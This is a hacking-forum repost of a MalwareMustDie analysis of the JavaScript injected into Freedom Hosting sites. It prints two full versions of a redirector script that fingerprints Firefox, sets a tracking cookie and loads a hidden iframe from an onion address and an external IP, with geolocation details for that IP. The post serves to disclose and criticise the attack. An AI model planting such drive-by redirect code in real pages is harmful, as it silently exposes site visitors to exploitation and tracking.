Jump to content
Fi8sVrs

Freedom Hosting FBI IFRAME Redirector Malware Script

By Fi8sVrs, in Programe hacking

Recommended Posts

  • Active Members
Fi8sVrs Rookie

Fi8sVrs

Posted
  • Active Members
Posted 

# MalwareMustDie!
# This is the malicious Javascript set codes injected to the Freedom Hosting site
# It contents the IFRAMER Malware method to redirect the victim to infector site, in url:
# http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
#
# Original copy at: www.twitlonger.com/show/n_1rlo0uu
# See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!!
# Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER.
# Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
# Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
# Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
# Ref: http://www.twitlonger.com/show/n_1rlo0uu
# Ref: http://pastebin.com/bu2Ya0n6
# Ref: http://pastebin.com/pmGEj9bV

# MalwareMustDie!

# This is the malicious Javascript set codes injected to the Freedom Hosting site

# It contents the IFRAMER Malware method to redirect the victim to infector site, in url:

# http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0

#

# Original copy at: www.twitlonger.com/show/n_1rlo0uu

# See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!!

# Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER.

# Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html

# Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/

# Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html

# Ref: http://www.twitlonger.com/show/n_1rlo0uu

# Ref: http://pastebin.com/bu2Ya0n6

# Ref: http://pastebin.com/pmGEj9bV

// Case 1

function createCookie(name,value,minutes) {

if (minutes) {

var date = new Date();

date.setTime(date.getTime()+(minutes*60*1000));

var expires = "; expires="+date.toGMTString();

}

else var expires = "";

document.cookie = name+"="+value+expires+"; path=/";

}

function readCookie(name) {

var nameEQ = name + "=";

var ca = document.cookie.split(';');

for(var i=0;i < ca.length;i++) {

var c = ca;

while (c.charAt(0)==' ') c = c.substring(1,c.length);

if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);

}

return null;

}

function isFF() {

return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));

}

function updatify() {

var iframe = document.createElement('iframe');

iframe.style.display = "inline";

iframe.frameBorder = "0";

iframe.scrolling = "no";

iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";

iframe.height = "5";

iframe.width = "*";

document.body.appendChild(iframe);

}

function format_quick() {

if ( ! readCookie("n_serv") ) {

createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);

updatify();

}

}

function isReady()

{

if ( document.readyState === "interactive" || document.readyState === "complete" ) {

if ( isFF() ) {

format_quick();

}

}

else

{

setTimeout(isReady, 250);

}

}

setTimeout(isReady, 250);

// Case 2

function createCookie(name, value, minutes) {

if (minutes) {

var date = new Date();

date.setTime(date.getTime() + (minutes * 60 * 1000));

var expires = "; expires=" + date.toGMTString();

} else var expires = "";

document.cookie = name + "=" + value + expires + "; path=/";

}

function readCookie(name) {

var nameEQ = name + "=";

var ca = document.cookie.split(';');

for (var i = 0; i < ca.length; i++) {

var c = ca;

while (c.charAt(0) == ' ') c = c.substring(1, c.length);

if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);

}

return null;

}

function isFF() {

return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));

}

function updatify() {

var iframe = document.createElement('iframe');

iframe.style.display = "inline";

iframe.frameBorder = "0";

iframe.scrolling = "no";

iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY

iframe.height = "5";

iframe.width = "*";

document.body.appendChild(iframe);

}

function freedomhost() {

if (!readCookie("n_serv")) {

createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);

updatify();

}

}

function isReady() {

if (document.readyState === "interactive" || document.readyState === "complete") {

if (isFF()) {

//window.alert(window.location + "Firefox Detected.")

freedomhost();

}

} else {

setTimeout(isReady, 250);

}

}

setTimeout(isReady, 250);

// Noted, same method,

// second script is w/IP info callback, contacting remote host as per marked (1)

IP Address: 65.222.202.53

City: Triadelphia

State or Region: West Virginia

Country: United States

ISP: Verizon Business

Latitude & Longitude: 40.0900-80.6220

Domain: verizonbusiness.com

ZIP Code: 26059

---

#MalwareMustDie! @unixfreaxjp

Source

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...